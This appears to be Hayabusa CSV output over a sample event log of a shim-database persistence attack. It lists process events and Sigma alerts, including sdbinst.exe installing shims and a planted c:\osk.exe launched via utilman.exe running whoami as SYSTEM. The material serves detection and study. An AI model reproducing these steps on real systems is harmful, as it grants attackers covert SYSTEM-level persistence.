+09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run 
key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application 
Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 
ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process 
Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: 